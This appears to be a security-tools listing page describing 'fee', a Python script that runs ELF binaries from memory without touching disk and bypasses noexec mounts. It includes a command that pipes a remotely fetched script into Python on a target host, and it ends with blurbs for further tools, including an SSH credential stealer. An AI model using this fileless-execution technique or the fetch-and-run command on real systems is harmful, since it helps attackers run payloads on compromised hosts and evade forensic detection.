This Python script generates interpreted code which creates the supplied ELF as a file in memory and executes it (without tmpfs).
This makes it possible to execute binaries without leaving traces on the disk.
The technique used for this is explained here.
With default options for each interpreter, running binaries using fee does not write to disk whatsoever. This can be verified using tools such as strace.
fee also completely ignores and bypasses noexec mount flags, even if they were set on /proc.
memfd_create support)Install this on your host machine using pipx:
$ pipx install fee… or regular pip:
$ pip install --user feeYou may also clone this repository and run the script directly.
Basic usage: supply the path to the binary you wish to drop:
$ fee /path/to/binary > output.pyYou can then pipe this into Python on the target:
$ curl my.example.site/output.py | pythonFor more information click here.
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…